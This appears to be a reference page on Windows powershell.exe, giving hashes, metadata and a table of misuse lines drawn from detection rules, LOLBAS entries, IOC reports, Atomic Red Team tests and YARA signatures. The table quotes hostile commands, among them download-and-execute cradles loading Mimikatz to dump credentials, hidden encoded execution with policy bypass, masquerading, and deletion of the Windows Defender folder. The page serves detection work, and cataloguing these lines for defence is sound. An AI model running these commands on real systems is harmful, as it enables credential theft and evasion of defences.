powershell.exe

File Path: C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
Description: Windows PowerShell

Hashes

Type	Hash
MD5	`C031E215B8B08C752BF362F6D4C5D3AD`
SHA1	`9F1E24917EF96BBB339F4E2A226ACAFD1009F47B`
SHA256	`840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3`
SHA384	`6D51041814E3A714461FFD740A4627C03AF5E9FFBC8FDC7CA6795DEBF0D45D2FC86FC08A5E92FF5C06F1231729D09259`
SHA512	`25B33E428D6B130E75F14F93BE39A2D87EB6FC658993E4545A0DD5C0712BF453DC64DB3B41A9142CFD005B324164D0F8F615C6ECEBB498EB162A410762833BE0`
SSDEEP	`6144:SkdhWg9x2CyRyCXBgoDhzoNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:pdO7RZgQhIKXzJ4pdd3klnnWosPhnzq`

Signature

Status: The file C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
Serial: ``
Thumbprint: ``
Issuer:
Subject:

File Metadata

Original Filename: PowerShell.EXE.MUI
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 6.3.9600.17396 (winblue_r4.141007-2030)
Product Version: 6.3.9600.17396
Language: English (United States)
Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File	Score
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe	74
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe	79
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe	74
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe	74
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe	71
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe	75
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	74
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	75
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	75
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	72
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	71
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	74
C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	91

Possible Misuse

The following table contains possible examples of powershell.exe being misused. While powershell.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	godmode_sigma_rule.yml	`- '\powershell.exe'`	DRL 1.0
sigma	win_powershell_snapins_hafnium.yml	`Image: '*\powershell.exe'`	DRL 1.0
sigma	win_bits_client_susp_powershell_job.yml	`processPath\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	win_asr_bypass_via_appvlp_re.yml	`CommandLine\\|re: '(?i).appvlp.exe.(cmd.exe\\|powershell.exe).*(.sh\\|.exe\\|.dll\\|.bin\\|.bat\\|.cmd\\|.js\\|.msh\\|.reg\\|.scr\\|.ps\\|.vb\\|.jar\\|.pl\\|.inf)'`	DRL 1.0
sigma	win_susp_logon_explicit_credentials.yml	`- '\powershell.exe'`	DRL 1.0
sigma	sysmon_powershell_code_injection.yml	`SourceImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	sysmon_suspicious_remote_thread.yml	`- '\powershell.exe'`	DRL 1.0
sigma	sysmon_susp_powershell_rundll32.yml	`SourceImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	win_susp_rclone_exec.yml	`- '\PowerShell.exe'`	DRL 1.0
sigma	file_event_win_creation_system_file.yml	`- '\powershell.exe'`	DRL 1.0
sigma	file_event_win_detect_powerup_dllhijacking.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	file_event_win_macro_file.yml	`- \powershell.exe`	DRL 1.0
sigma	file_event_win_powershell_startup_shortcuts.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	file_event_win_susp_adsi_cache_usage.yml	`- 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe'`	DRL 1.0
sigma	file_event_win_susp_ntds_dit.yml	`- '\powershell.exe'`	DRL 1.0
sigma	file_event_win_win_shell_write_susp_directory.yml	`- '\powershell.exe'`	DRL 1.0
sigma	image_load_alternate_powershell_hosts_moduleload.yml	`description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe`	DRL 1.0
sigma	image_load_alternate_powershell_hosts_moduleload.yml	`- '\powershell.exe'`	DRL 1.0
sigma	image_load_in_memory_powershell.yml	`description: Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's "load powershell" extension.`	DRL 1.0
sigma	image_load_in_memory_powershell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	image_load_suspicious_dbghelp_dbgcore_load.yml	`# - '\powershell.exe' triggered by installing common software`	DRL 1.0
sigma	image_load_wsman_provider_image_load.yml	`- '\powershell.exe'`	DRL 1.0
sigma	net_connection_win_powershell_network_connection.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	pipe_created_alternate_powershell_hosts_pipe.yml	`description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe`	DRL 1.0
sigma	pipe_created_alternate_powershell_hosts_pipe.yml	`- '\powershell.exe'`	DRL 1.0
sigma	posh_pc_alternate_powershell_hosts.yml	`description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe`	DRL 1.0
sigma	posh_pc_alternate_powershell_hosts.yml	`- HostApplication\\|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'`	DRL 1.0
sigma	posh_pc_renamed_powershell.yml	`- powershell.exe`	DRL 1.0
sigma	posh_pc_renamed_powershell.yml	`- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe`	DRL 1.0
sigma	posh_pc_wsman_com_provider_no_powershell.yml	`description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.`	DRL 1.0
sigma	posh_pm_alternate_powershell_hosts.yml	`description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe`	DRL 1.0
sigma	posh_pm_alternate_powershell_hosts.yml	`ContextInfo\\|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event`	DRL 1.0
sigma	proc_creation_win_abusing_debug_privilege.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_apt_babyshark.yml	`- powershell.exe mshta.exe http*`	DRL 1.0
sigma	proc_creation_win_apt_muddywater_dnstunnel.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_apt_wocao.yml	`- 'cmd /c powershell.exe -ep bypass -file c:\s.ps1'`	DRL 1.0
sigma	proc_creation_win_dnscat2_powershell_implementation.yml	`ParentImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_exploit_cve_2020_10189.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_html_help_spawn.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_mmc_spawn_shell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_mshta_spawn_shell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_multiple_suspicious_cli.yml	`- powershell.exe`	DRL 1.0
sigma	proc_creation_win_new_service_creation.yml	`- Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_non_interactive_powershell.yml	`description: Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.`	DRL 1.0
sigma	proc_creation_win_non_interactive_powershell.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_office_shell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_outlook_shell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_bitsjob.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_cmdline_reversed_strings.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_cmdline_special_characters.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_cmdline_specific_comb_methods.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_disable_windef_av.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_downgrade_attack.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_download.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_reverse_shell_connection.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powershell_suspicious_parameter_variation.yml	`- '\Powershell.exe'`	DRL 1.0
sigma	proc_creation_win_powersploit_empire_schtasks.yml	`ParentImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_remote_time_discovery.yml	`- Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_renamed_binary.yml	`- 'powershell.exe'`	DRL 1.0
sigma	proc_creation_win_renamed_binary.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_renamed_binary_highly_relevant.yml	`- 'powershell.exe'`	DRL 1.0
sigma	proc_creation_win_renamed_binary_highly_relevant.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_renamed_powershell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_run_powershell_script_from_ads.yml	`ParentImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_run_powershell_script_from_ads.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_run_powershell_script_from_input_stream.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_screenconnect_anomaly.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_script_event_consumer_spawn.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_shadow_copies_creation.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_shadow_copies_deletion.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_shell_spawn_mshta.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_shell_spawn_susp_program.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_bitstransfer.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_crackmapexec_execution.yml	`- 'powershell.exe -exec bypass -noni -nop -w 1 -C "'`	DRL 1.0
sigma	proc_creation_win_susp_crackmapexec_execution.yml	`- 'powershell.exe -noni -nop -w 1 -enc '`	DRL 1.0
sigma	proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml	`CommandLine\\|contains: 'powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_eventlog_clear.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_mshta_pattern.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_pester.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_powershell_encode.yml	`Image\\|endswith: \powershell.exe`	DRL 1.0
sigma	proc_creation_win_susp_powershell_hidden_b64_cmd.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_powershell_parent_combo.yml	`Image\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_powershell_parent_process.yml	`description: Detects a suspicious parents of powershell.exe`	DRL 1.0
sigma	proc_creation_win_susp_ps_appdata.yml	`- 'powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_rclone_execution.yml	`- '\PowerShell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_regsvr32_anomalies.yml	`ParentImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_script_exec_from_env_folder.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_script_exec_from_env_folder.yml	`- 'powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_script_exec_from_temp.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_servu_process_pattern.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_by_java.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_by_java_keytool.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_from_mssql.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_from_winrm.yml	`- '*\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_spoolsv_child_processes.yml	`Image\\|endswith: \powershell.exe`	DRL 1.0
sigma	proc_creation_win_susp_use_of_csharp_console.yml	`ParentImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_susp_whoami_anomaly.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_system_exe_anomaly.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_vmtoolsd_susp_child_process.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_webshell_spawn.yml	`- '\powershell.exe'`	DRL 1.0
sigma	proc_creation_win_wmi_spwns_powershell.yml	`- '\powershell.exe'`	DRL 1.0
sigma	sysmon_accessing_winapi_in_powershell_credentials_dumping.yml	`SourceImage\\|endswith: '\powershell.exe'`	DRL 1.0
sigma	sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml	`- '\powershell.exe'`	DRL 1.0
LOLBAS	Powershell.yml	`Name: Powershell.exe`
LOLBAS	Powershell.yml	`- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`
LOLBAS	Powershell.yml	`- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
LOLBAS	CL_LoadAssembly.yml	`- Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'`
LOLBAS	UtilityFunctions.yml	`- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'`
LOLBAS	Agentexecutor.yml	`Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument`
LOLBAS	Agentexecutor.yml	`Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully`
LOLBAS	Appvlp.yml	`- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"`
LOLBAS	Appvlp.yml	`Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.`
LOLBAS	Appvlp.yml	`- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"`
LOLBAS	Mftrace.yml	`- Command: Mftrace.exe powershell.exe`
LOLBAS	Mftrace.yml	`Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.`
LOLBAS	Remote.yml	`- Command: Remote.exe /s "powershell.exe" anythinghere`
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	`"https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",`	© ESET 2014-2018
malware-ioc	misp_invisimole.json	"description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.\n\nDetection: Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate\/Decode Files or Information in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and execuited on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, Process command-line parameters, Process monitoring\n\nPermissions Required: User",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway",	© ESET 2014-2018
atomic-red-team	index.md	- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]	MIT License. © 2018 Red Canary
atomic-red-team	T1027.md	powershell.exe -EncodedCommand $EncodedCommand	MIT License. © 2018 Red Canary
atomic-red-team	T1027.md	powershell.exe -Command “IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))”	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	- Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1	MIT License. © 2018 Red Canary
atomic-red-team	T1036.003.md	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1	MIT License. © 2018 Red Canary
atomic-red-team	T1036.004.md	schtasks /create /ru system /sc daily /tr “cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1” /tn win32times /f	MIT License. © 2018 Red Canary
atomic-red-team	T1049.md	Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	schtasks.exe /Create /F /TN “ATOMIC-T1053.005” /TR “cmd /c start /min "" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))” /sc daily /st #{time}	MIT License. © 2018 Red Canary
atomic-red-team	T1055.001.md	Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	PowerShell commands/scripts can also be executed without directly invoking the `powershell.exe` binary through interfaces to PowerShell’s underlying `System.Management.Automation` assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘#{mimurl}’); Invoke-Mimikatz -DumpCreds”	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1’); Invoke-AppPathBypass -Payload ‘C:\Windows\System32\cmd.exe’”	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	powershell.exe -exec bypass -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(‘GET’,’#{url}’,$False);$comMsXml.Send();IEX $comMsXml.ResponseText”	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -exec bypass -noprofile “$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(‘#{url}’);$Xml.command.a.execute \| IEX”	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	powershell.exe -version 2 -Command Write-Host $PSVersion	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Executes powershell.exe with variations of the -Command parameter	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Executes powershell.exe with variations of the -EncodedCommand parameter	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	powershell.exe -e #{obfuscated_code}	MIT License. © 2018 Red Canary
atomic-red-team	T1123.md	powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet	MIT License. © 2018 Red Canary
atomic-red-team	T1134.004.md	Spawns a powershell.exe process as a child of the current process.	MIT License. © 2018 Red Canary
atomic-red-team	T1134.004.md	\| file_path \| File path or name of process to spawn \| Path \| $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe\|	MIT License. © 2018 Red Canary
atomic-red-team	T1134.004.md	Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	mshta.exe “about:'"	MIT License. © 2018 Red Canary
atomic-red-team	T1543.003.md	sc config Fax binPath= “C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c "write-host ‘T1543.003 Test’"”	MIT License. © 2018 Red Canary
atomic-red-team	T1547.001.md	\| thing_to_execute \| Thing to Run \| Path \| powershell.exe\|	MIT License. © 2018 Red Canary
atomic-red-team	T1564.003.md	On Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is `powershell.exe -WindowStyle Hidden`. (Citation: PowerShell About 2019)	MIT License. © 2018 Red Canary
atomic-red-team	T1564.003.md	\| powershell_command \| Command to launch calc.exe from a hidden PowerShell Window \| String \| powershell.exe -WindowStyle hidden calc.exe\|	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	\| executable_command \| Command to execute as a service \| String \| %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt\|	MIT License. © 2018 Red Canary
atomic-red-team	T1574.001.md	Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.	MIT License. © 2018 Red Canary
atomic-red-team	T1574.001.md	copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe	MIT License. © 2018 Red Canary
atomic-red-team	T1588.002.md	#{local_folder}#{local_executable} “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” /WindowState 0 /CommandLine “rmdir ‘C:\ProgramData\Microsoft\Windows Defender’ -Recurse” /StartDirectory “” /RunAs 8 /Run	MIT License. © 2018 Red Canary
signature-base	apt_apt34.yar	$x3 = “powershell.exe -exec bypass -enc " + ${global:$http_ag} +” wide	CC BY-NC 4.0
signature-base	apt_fin7.yar	$x3 = “\par \tab \tab \tab sh.Run "powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File " & pToPSCb, 0, False” fullword ascii	CC BY-NC 4.0
signature-base	apt_greenbug.yar	$s1 = “powershell.exe -nologo -windowstyle hidden -c "Set-ExecutionPolicy -scope currentuser” fullword ascii	CC BY-NC 4.0
signature-base	apt_greenbug.yar	$s2 = “powershell.exe -c "Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . "” fullword ascii	CC BY-NC 4.0
signature-base	apt_lazarus_dec17.yar	$x1 = “$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList” fullword ascii	CC BY-NC 4.0
signature-base	apt_lazarus_dec17.yar	$x5 = “/tr "powershell.exe -ep bypass -windowstyle hidden -file “ ascii	CC BY-NC 4.0
signature-base	apt_magichound.yar	$s1 = “powershell.exe “ fullword ascii	CC BY-NC 4.0
signature-base	apt_middle_east_talosreport.yar	$x1 = “objWShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""%appdata%""\sys.ps1", 0 “ fullword ascii	CC BY-NC 4.0
signature-base	apt_molerats_jul17.yar	$x1 = “powershell.exe -nop -c "iex” nocase ascii	CC BY-NC 4.0
signature-base	apt_ncsc_report_04_2018.yar	$ = “powershell.exe” ascii	CC BY-NC 4.0
signature-base	apt_oilrig.yar	$x2 = “wss.Run "powershell.exe " & Chr(34) & "& {waitfor haha /T 2}" & Chr(34), 0” fullword ascii	CC BY-NC 4.0
signature-base	apt_oilrig.yar	$x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘__’,(Get-Random) \| Set-C” ascii	CC BY-NC 4.0
signature-base	apt_oilrig.yar	$x1 = “Powershell.exe -exec bypass -file ${global:$address1}”	CC BY-NC 4.0
signature-base	apt_unc2447_sombrat.yar	$x1 = “powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::” ascii	CC BY-NC 4.0
